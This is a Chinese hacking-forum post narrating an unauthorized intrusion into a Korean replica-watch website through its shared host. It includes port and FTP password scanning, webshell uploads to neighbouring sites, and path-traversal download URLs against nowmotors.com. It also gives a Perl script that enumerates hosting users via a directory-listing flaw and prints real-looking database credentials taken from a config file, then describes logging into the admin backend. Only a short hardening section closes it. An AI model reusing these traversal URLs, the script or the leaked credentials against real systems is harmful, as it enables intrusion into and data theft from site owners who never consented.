中国网络渗透测试联盟
标题:
对韩国某手表网站的一次偶然安全检测
[打印本页]
作者:
admin
时间:
2012-11-6 21:15
标题:
对韩国某手表网站的一次偶然安全检测
韩国是美国的小弟,俺是安全爱好者,看到网站就想看看该网站的安全做的如何,当我浏览网站产品时,如果要查看详细情况时,都会自动跳转到登录页面。如图2所示,仅仅查看而已,都要登录,有这个必要吗?到底它网站的安全性如何呢?
B: X& I6 D" u- Z% w5 t- p
http://images.51cto.com/files/uploadimg/20081104/163830926.jpg
' i9 p7 B3 |' b% ?- Z& B
图2跳转后的登录界面
, k4 \4 V* h4 e: E# S( A2 o
: K4 w" q' Z6 I% r/ ?
! C" j+ B$ I- f- ~
一、信息收集
3 C& D7 H+ n( t4 j3 p
1.获取IP地址
1 W. B: }/ `8 f) G6 K* _) H) I3 Z
首先打开DOS窗口,然后使用“ping XXX.net”获取该网站的真实IP地址,如图3所示,通过ping命令知道该主机应该采取了一些安全措施,丢包率比较高,应该是禁止进行ping等命令。
4 j& O' ?4 K& A+ s# M q
链接标记
http://images.51cto.com/files/uploadimg/20081104/163845179.jpg
2 l; N3 E- P1 Q) B
图3 获取真实IP地址
' a0 ]: X1 H4 d- J1 j1 C* r: p
! \5 _! ^0 B+ t- c
. [2 `! m; S9 _( M ]* S7 S
2.使用superscan探测端口
8 @( ~8 j7 }( \* n8 T
请出俺的扫描工具——superscan,使用supersan3.0扫了一下IP地址为“XX.XX.85.96”的端口开放情况,如图4所示,发现只开了21,22,80端口,从端口开放情况来看,对外提供服务仅仅21和80端口,感觉安全应该还可以,只能从Web和Ftp来入手。
\' G! E) {2 p: D
链接标记
http://images.51cto.com/files/uploadimg/20081104/163910321.jpg
* `5 ~; @. I* R
图4情况开放情况
9 Q! ]4 I- Y3 T1 k9 Z9 q' S! C3 R
) h4 m0 b* ^+ _- ^
# F' L& _* @5 J. `" Y
3.Ftp口令扫描
; H: C2 ^9 @$ S* v3 M$ \
使用一些Ftp口令扫描工具对该IP地址扫描,使用了多个字典进行扫描,均未成功,看来Ftp口令扫描攻击方法不行。
0 A. e- _+ x! r+ T, O; Z
说明:
# K e' J' N' @9 V4 i6 t$ \
一般站点都会开放Ftp服务,Ftp服务主要用来上传程序等,一般默认会设置在Web目录,因此一旦获取了Ftp口令,就可以跟用户一样“正常”使用Ftp来上传和下载Web程序,通过上传Webshell或者获取数据库等方式来进行渗透和控制。
) g% A# @! m0 r( n
二、检查SQL注入攻击点
6 x+ X- R6 g2 F) M4 n) j6 `
1.寻找注入点
/ ?# w4 ?) g" X- p8 S( Y- c4 Y
先手动对该网站地址进行SQL注入点的检测,在地址后加入“’”、“or”等,例如在地址栏中分别输入:
链接标记[url]http://XXX.net/goods/content.asp?big=3&middle=12&small=1&num=30967
’[/url]后回车,在地址栏中会自动变成“
链接标记[url]http://rolexcopy.net/goods/content.asp?big=3&middle=12&small=1&num=30967%20and%201=1
[/url]”,如图5所示,
2 K' Q; Q1 H9 \2 F+ I: [
链接标记
http://images.51cto.com/files/uploadimg/20081104/163926236.jpg
2 v; s9 `6 @7 P& }: j
图5 出现SQL错误提示
7 ^# ]% i, k! X
: u# q3 ?7 _) V# d$ |4 j4 h6 @
虽然手动检测结果提示为SQL错误,当后面使用一些脚本测试,没有找到明显的SQL注入点,使用HDSI等工具进行探测的结果也显示无注入点,说明暂时找不到注入点。
7 s1 F6 t% A* g4 K. D$ x' r# A
2.寻找上传地址
! J2 b) V) h4 H1 B
通过是使用Flashget以及digshell挖掘鸡等工具对该网站进行上传地址搜索和检查,在
链接标记[url]http://xxx.net/other/contact_us.asp
[/url]这个页面找到一个上传,但不能上传asp、asa等可以提升权限的文件类型。
m' o4 O$ Y7 B* y
3.旁注信息搜集
2 z) s* f! ?0 S4 Q. K* t
既然正面不能突破,那么就从侧面,通过旁注来看看可否获取该网站的Webshell。打开
链接标记[url]http://www.myipneighbors.com/
[/url] 输入XXX.net后发现同一服务器下一共有226个站,如图6所示。
) b1 ^5 a/ O7 P: w
链接标记
http://images.51cto.com/files/uploadimg/20081104/164425298.jpg
# ]* E. j& T+ l, q6 p, ]& K
图6同一服务器下的存在的网站
1 [* [! K! A2 v
9 j) @3 S" v# I0 r# k u! b
: n$ N" i. _/ b
说明:
( \7 ?% ^, B# X4 y
链接标记[url]http://www.myipneighbors.com/
[/url] 是一个通过IP地址或者域名来获取该IP地址或者域名所在服务器中所存在的其它网站地址。它是一个旁注的辅助工具,当然在明小子Domain3.5以及其它一些工具软件中也有这个功能。
- J& N" g! n T5 v2 e3 ~" J
既然在该IP地址上有226个网站,那就从其它网站入手吧。
$ ]5 Z# n* Z8 G- X
4.尝试对其它站点进行渗透
2 H! R i3 r/ H5 q
对剩下的225个网站随机进行SQL注入点探测,随机选中一个网站“hansincar.cafe24.com”,从中找到一个可上传的地方,可以直接上传文件,将本地的一个Webshell文件上传到该站点,上传文件成功后,asp木马却无法运行,如图7所示。
+ p5 {3 Y9 R1 n" `' R
链接标记
http://images.51cto.com/files/uploadimg/20081104/164003770.jpg
+ B, e+ @! }1 e8 N; e# c0 m2 Z
图7无权限运行asp木马
( X) N0 {) }9 S6 f: I
+ x6 D$ X, n& C2 P
看来该站点无法找到突破点,那就选择下一个网站进行探测吧。后面我对多个站点进行了SQL注入探测和寻找文件上传地址。通过探测虽然很多网站存在注入点,但都是public权限,无法备份得shell;即使成功进入后台后,有上传的地方,上传后还是没有运行脚本的权限。
' z0 ^7 p- y' _7 P0 P9 y
说明管理员对该主机采取了严格的基于网站用户角色的安全权限策略,安全设置比较变态,对每个可上传的目录做了限制,仅对已知文件脚本类型运行,而禁止对其它脚本运行,各个网站之间安全先对独立。
% e2 o+ p& ]9 y) L
三、获取突破点
% `- S8 Z; n) o7 y f2 X
1.任意下载文件
! g$ l& `7 E4 O2 ?4 L3 p# s) O. e
在我即将要放弃安全测试时,在打开
链接标记[url]http://nowmotors.com/bbs/content
... =164&bid=used01[/url]页面时,发现可以有下载的地方,而下载的参数就是一个文件,如果没有做限制的话,那就可以下载任何文件!如图8所示。
, I9 R @# p" Q# p, p+ @) U
链接标记
http://images.51cto.com/files/uploadimg/20081104/164039139.jpg
, A3 r; Q2 X! D* W8 Y: o
图8下载文件页面
7 f. {5 S8 S( G
2 |% p7 U5 E) e& p, y0 q
- K7 x" i" p D
2.获取上传文件地址
]) w$ c, W+ \/ X& H: ~9 m' ] S
通过测试发现该上传页面可以上传任何文件,而在对另一网站注入时,也得到了网站的绝对路径(F:\HOME\HANSINCAR\WWW\HELPDESK\../board/inc/view.asp),如图9所示。
9 S+ f9 t) j6 J
链接标记
http://images.51cto.com/files/uploadimg/20081104/164054405.jpg
- X1 U0 t3 T7 @: b8 H& b
图9获取网站的绝对路径
( b6 C" H% F( V2 B
9 k/ S1 o/ E" u3 D
3.推测网站绝对路径
7 C8 M! k7 ^' X
通过观察,可以知道在该服务器上每个网站的绝对路径就是“F:\用户名\WWW\”,于是可以构造一个地址下载网站中的源程序:
链接标记[url]http://nowmotors.com/bbs/filedow
... w/goods/submain.asp[/url]
* \8 K: b( N7 p: s( [5 ^
说明:
$ u; e) N C: H* q9 Y! b. }' H
(1)打算下载
链接标记[url]http://XXX.net/goods/submain.asp
[/url]文件(这里说明一下,因为down默认检查文件名的目录是DEXTUpload/editor/中,查看图片的属性就知道了,所以要"../../"返回网站的根目录),但发现却无法下载,如图10所示。
7 |- m3 }* K9 `! c6 T- t. o
链接标记
http://images.51cto.com/files/uploadimg/20081104/164108656.jpg
$ a+ d6 Z W6 b0 J2 s; M. S2 b
图10无法下载源文件
5 {1 W$ {0 S) V9 Y. @
Z- y4 B8 c' {
0 b3 p% @% H5 }; k o, K
(2)分析不能下载原因
( K% v# L7 b! T0 H6 s) R
难道真的做了限制,还是权限问题?还是其它,nowmotors.com网站肯定存在上传漏洞,更换一个网站进行测试:
* k# y! I- s2 |5 f
链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../hansincar/www/board/inc/view.asp
[/url]
. L6 I- K7 y/ R: S5 i- S) E& F9 T. G
发现可以下载,如图11所示。
" R" }) y( E3 `9 p- U% D
链接标记
http://images.51cto.com/files/uploadimg/20081104/164238964.jpg
- C Y! ?5 n( T7 b, E
图11正常下载nowmotors.com网站文件
7 f0 B. R$ {9 ?6 B9 d3 q6 }
. E5 p1 ]8 D- H3 c: H
( Q: V6 }; [3 z, \- ~( l' Z% P. H2 `
但为什么不能下载XXX.net网站中的文件呢,该网站中的submain.asp是存在的,那只有一种可能——用户名XXX不存在。
2 w, q9 Q6 L) Z6 r; @
(3)获取网站的真正用户名
7 `. c- `7 g; _9 S1 s
怎么找到此网站的用户名呢?一个好的办法就是通过网站域名注册信息来获取用户的网站用户名,通过whois.domaintools.com来获取
5 T; o5 _( | Z& K4 q" I5 J/ b
XXX.net网站域名注册信息,如图12所示。
) m* d) e' H: x0 a. i7 R; ]% F
链接标记
http://images.51cto.com/files/uploadimg/20081104/164250229.jpg
( u# A& `1 A# A
图12获取rolexcopy的域名注册信息
2 |8 _2 a! i4 ^$ L0 c( a( ]! [+ N
; N; x! b* c/ o4 z/ \ k' K% B/ h
- J4 A3 z( c( p% M% C
(4)下载仍然失败
E. ^, g. p9 {# j- U6 _( ^
于是尝试将原来的用户名更换为“tmdgus022”和“tmdgus”,进行测试:
链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../tmdgus022/www/goods/submain.asp
[/url]
链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../tmdgus/www/goods/submain.asp
[/url]
0 ]5 \ ]$ R" r8 y
测试结果都显示找不到文件,看来通过该方法仍然无法下载源文件。
% ? X, s; Z1 j6 M
四、新的转机
+ c: R# F4 W9 e! I Q1 \% Y" ]6 m
1.动手构建获取网站用户名的程序
5 A4 B( r4 A: q2 [
现在的问题就是要找到网站对应的用户名。在某一网站后台,发现有可以列目录。
/ C! _, t; o. A4 b+ v# S1 ]2 ^
却跳不出该网站的根目录(在根目录时,“../”是不可点击),不可点击,那可以构造URL跳出,于是先看点击返回上一级目录时跳转到的URL,
0 @8 w( b$ F" Q/ O! [/ ]8 ~. }
于是找到处理该JS的代码,如下:
7 ?. {" [) e+ s0 r: S& E `9 G
[pre]function page_link(FormName, InputName, f_prev, r_name, r_folder, l_folder, last) {
! `6 y* w0 G! E; a( b N
var targetSTR;
, n6 E2 E$ i9 h7 W, t
B S k! X5 ~* m2 v/ s& Q
targetSTR = "dir.asp?FormName="+FormName+"&InputName=
_: j4 |( f5 U% [4 h9 x4 v% @; W4 d
"+InputName+"&f_location="+f_prev;
8 _5 f( D' r- X1 F% l! x
targetSTR = targetSTR+"&r_location="+r_name+"&r_folder=
1 I+ A' N2 q, W, [& Y) d* t
"+r_folder+"&l_folder="+l_folder+"&last="+last;
* @* E! j2 v2 e. J
window.location.href = targetSTR;
; ], @5 J" j/ N# g! X$ b
}
w7 \9 V3 Q2 z: Z$ g
原来跳转到pop_directory.asp,其它参数都不重要,最重要的是f_location这个参数,
5 B5 Z0 `. l: S6 `2 i& f$ X3 l
于是先测试c1saju.com网站,在浏览器中输入:
8 g6 _' L/ S' o; z3 ]) s
链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=&last=ok
[/url]
* t: i8 m6 [3 w, v! _ G
[/pre]
2 W4 P J8 o+ k* ?
& t! p1 M: J1 a
列出了当前网站的根目录,如图13所示。
2 Z5 `* M( H2 ]/ i9 d! X8 ]3 ^
链接标记
http://images.51cto.com/files/uploadimg/20081104/164305690.jpg
8 ~4 q+ l. ?) \4 C/ Z: C, P
图13 使用js文件列c1saju.com网站根目录
: ~7 N5 Y; E) g
: G' E1 ^" e! |$ L7 C) H, _4 Q
" Z9 ^4 g. i' \& e, J. m" F
2.获取根目录用户名称
2 e& h' ?* _3 p7 m7 T
如果要返回到F:\home就要构造URL:
2 x4 O- l+ z' {
链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=../../&last=ok
[/url]因为网站的根目录在F:\home\***\www下,发现还是pop_directory.asp的文件还是在网站的根目录下,难道说不能跳出?再仔细看了下“../../”不是刚好返回到网站根目录吗,因为pop_directory.asp文件在F:\home\***\www\admin\inc\目录下,于是重新构造URL
- E( J- J/ o T0 }% h3 T
链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=../../../../&last=ok
[/url]
9 b# j( s- `' a# S V1 ?! w: ?
终于跳到F:\home目录中了,全部的用户名都出来了,如图14所示。
) q: P0 t8 `5 R1 D. f9 i7 V7 K' v
链接标记
http://images.51cto.com/files/uploadimg/20081104/164318699.jpg
! M7 C6 Z' Q2 S
图14列出home目录所有用户
) t1 j* J- e0 }3 h# o
/ _4 ^& {( O* p
) F% Z7 O. L8 Z0 f
3.动手编写find.pl脚本自动获取用户
1 R- S/ t4 M; c5 C* ~! e" r( ]- H- X* e/ ^
下面的工作就简单了,就是一个个文件夹点进去,看那个是目录目标网站(
链接标记[url]http://XXX.net/
[/url]),然后就再构造URL下载就行了,但200多个站,一个个看,那不是很累?于是想出来偷懒的方法,写个脚本来自己找吧,先把网站全部用户复制下来,保存到user.txt文件中,再分析目标站点登录界面源代码,发现网站admin/image目录下有个admin_bk.gif文件,将其作为识别特征,也就是说只要我列出每个admin/image目录中目录下发现有admin_bk.gif文件,说明就可能是目标网站了。Find.pl的脚本源代码如下:
! ^. E/ B9 l' j5 |$ w: G! x
[pre]use LWP;
% v8 M s( r, P: ? ?7 }
use HTTP::Cookies;
8 _8 o, g+ e9 B' B# L+ N, G
use HTTP::Request::Common qw(POST);
6 R: ^9 R p; Y
my $ua=new LWP::UserAgent;
s7 T/ g. W; _
$ua->agent('Mozilla/5.0');
: ^, L. V( f9 T: V; Z
$ua->cookie_jar(new HTTP::Cookies);
7 s5 A6 a8 _# s
open(FILE,"user.txt") || die ("Could not open file");
& K* w a; C+ k
my @arr=;
- M' Y- i! K8 D
for my $line (@arr) {
$ i" R/ C, ]& m5 a! l4 M( ?
chomp $line;
, c' \# p5 ^! a) g0 W6 u
any($line);
# m2 Z4 s+ Q2 ~& }" T
}
( U7 c/ q% G* I( G9 e
sub any {
$ v9 ~7 z5 @1 u8 R
print "分析$_[0]\n";
* f, y$ Z$ N- `. D; b( d" \3 d, B& }/ y
my $url="
链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?
[/url]
4 t4 {2 h9 f2 J) v6 G2 C x5 C0 D
FormName=all&InputName=ji_AbsFolder&f_location=../../../../$_
! m- C8 D- L/ e! }* `
[0]/www/admin/image&r_location=../../../../&r_folder=
- }" i$ \$ M! i6 T- w& t
$_[0]/www/admin/image&l_folder=admin&last=";
! V) E+ u* z b' x0 v& L
my ($content, $status, $is_success) = do_GET($url);
/ V4 G6 A2 H, o6 a
if ($content =~ m/pop_directory.asp/) {
4 `: }3 [ E. i6 r! v1 J5 g; @
next;
3 o$ S# D% T0 I* f6 T ^
}elsif ($content =~ m/admin_bk.gif/) {
8 M& ?, L( Y/ ^- a( T
ok($_[0]);
* ?" z& P! }- s' G& @9 \; A" ?
}
( O! Q( q& v% B% f
}
6 g" T8 S3 m* U/ j4 @
sub do_GET {
9 P4 u- F9 j/ g/ d6 |6 s
$browser = LWP::UserAgent->new unless $browser;
3 X: l$ X& i" a7 ?/ n
my $resp = $browser->get(@_);
8 N2 i- [2 j7 g& Z
return ($resp->content, $resp->status_line, $resp->is_success, $resp)
. v, G. r0 q6 ^5 w- T
if wantarray;
^4 Q) p: g3 r, D8 U8 F
return unless $resp->is_success;
" M8 \+ ^9 i8 m0 E: l$ s
return $resp->content;
' w* [3 z. v% k# s: |
}
# U! T8 u! {" Y" J
sub ok {
4 g2 a, U2 I0 o3 j6 v
open(FILE1,">>e:/perl/0k.txt") || die ("Could not open file");
' C& u3 b, o% d. T0 h( K5 ~
print FILE1 "$_[0]\r\n";
( W+ n, r$ g! i3 [2 ]
close(FILE1);
& u4 }$ J, J' n ?+ j
}
9 F7 ]; {' h# }" e9 Y3 W% r, }
[/pre]
2 c: v1 P( ] ]6 B! _# d0 u
1 Y5 o$ U$ W. \& z0 T
在本地运行一下find.pl,等待一分钟左右再打开ok.txt,在该文件中发现有多个用户名
0 _( ]) m" n# j F$ M7 L
注意:
& l; h# ~8 ^# h$ h% V
如果选好过滤的文件为admin_bk.gif,就不会出现那么多用户名了。
8 v1 A+ S/ U: T3 F& \/ u
4. 获取rolexcopy.net网站的真实目录
( w0 l6 P% n- f* w1 u
通过在浏览器中对find.pl找到的ok.txt结果进行查看,当找到mykom.cafe24.com,发现和网站
链接标记[url]http://XXX.net/
[/url]一摸一样,XXX.net网站的目录就是“mykom”目录,如图15所示。
$ d: O8 k0 n3 I* ?7 @: w( z
链接标记
http://images.51cto.com/files/uploadimg/20081104/164334325.jpg
8 s4 r, K6 ~ ~: q' g9 Y! m- h- K
图15获取rolexcopy.net网站的真实目录mykom
4 C' R% F1 A9 J! C3 R" i
' K$ S/ y, J* S' P
& b5 m1 V8 B# C) m2 t: t1 I
5.下载数据库文件
7 E1 y, I; ?" A# O1 L% q( Y
通过分析该网站目录,找到数据库配置文件dbconfig.asp,通过nowmotors.com网站的文件下载漏洞将其下载到本地:
$ o0 \' J* s3 Q/ h$ d; D0 }* t6 t4 n
链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../mykom/www/dbconfig.asp
[/url]
; \# c) r7 {' ^; `
成功下载,打看看,得到了用户名和密码。
7 U5 D/ q* M) ^- L
[pre]db_name = "mykom"
4 O7 A1 @* H) I2 y
db_id = "mykom"
: J% W6 T9 r! C% U7 Q8 J0 h
db_pass = "parksu7616"
v9 i8 [' i7 u8 T/ y6 X' s
db_domain = "sql-007.cafe24.com"
9 h1 `1 X: u. B4 ~4 Z7 K
[/pre]
6 A+ Q! ~6 O' j* }9 ?7 w
; z- K4 S" D7 ^( D+ ?9 v
在本地用webshell连接一下远程数据库,得到管理员用户名和密码,如图16所示,管理员对应的密码为名为,省去破解md5密码值了。
3 ]; A* a! X8 x. Y# u
链接标记
http://images.51cto.com/files/uploadimg/20081104/164346549.jpg
5 d# Z+ U' S- q& x8 _
图16 使用本地rootkit.asp获取用户名和密码
$ n+ f; G7 P* E5 ]
v2 p, t: W/ t5 K$ a5 R! `
) w1 n7 Z0 ~% ]; s/ U3 \
6.进入管理后台
1 `& p( X& S9 F& k5 _$ Q9 S
在后台直接输入获取的用户名和密码登录,如图17所示,成功进入后台,由于俺不是哈韩族,也不认识几个韩文,检查到此为止!
链接标记
http://images.51cto.com/files/uploadimg/20081104/164357112.jpg
2 s/ U. `/ R5 ]
图17成功进入rolexcopy.net网站管理后台
) W2 r! D$ P: |0 a0 ^9 N: S
! B1 Z: }( {% T0 a1 D0 Z5 D
五、安全防范措施
3 ?0 V* R) j+ }6 W+ q
就本此渗透过程来看,网站的安全已经设置的比较到位了,但是由于程序中的漏洞,导致了本次渗透成功,因此从安全防范的措施来说,建议就如下方面进行安全加固:
( _- Z: m8 M' M- H0 a
(1)严格过来脚本
* l4 s* {+ Q' y/ N. F$ ^3 | C3 o
对于可下载任意文件这个漏洞,不少网站都存在,后果也很严重,其实最简单的方法就是把filename参数里的”../”过滤掉就OK了。
! R. M/ V' F% R5 g
(2)涉及用户登录模块,一定要对密码进行加密,而且建议采取一些经过变换的md5加密。
0 `5 r" e, G3 v6 k( S: s! R
(3)重新审查程序中SQL注入漏洞和XSS漏洞,本此检查未对XSS进行检查,但该服务器下多个网站存在SQL注入漏洞,因此也是安全的一个隐患。
9 y* {, R! `" a- V7 I
六、总结与体会
o) N6 r) ?5 ?; R$ D, U8 I( q# d
本次从检测上来说,并没有什么新的检测技术,都是一些老技术。本次检测的亮点就是自己动手编写了一个搜索脚本,自动获取管理用户目录;同时也说明在注入时代,不通过过注入,也一样可以拿到一个网站后台。最后需要提一下perl语言,它真是个好的语言,特别是处理一些重复的网页问题时,可以让我们减少很多重复性的工作,在入侵过程可以起到事半功倍的效果。
+ ]$ S2 v/ w2 ~& q$ d0 n
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2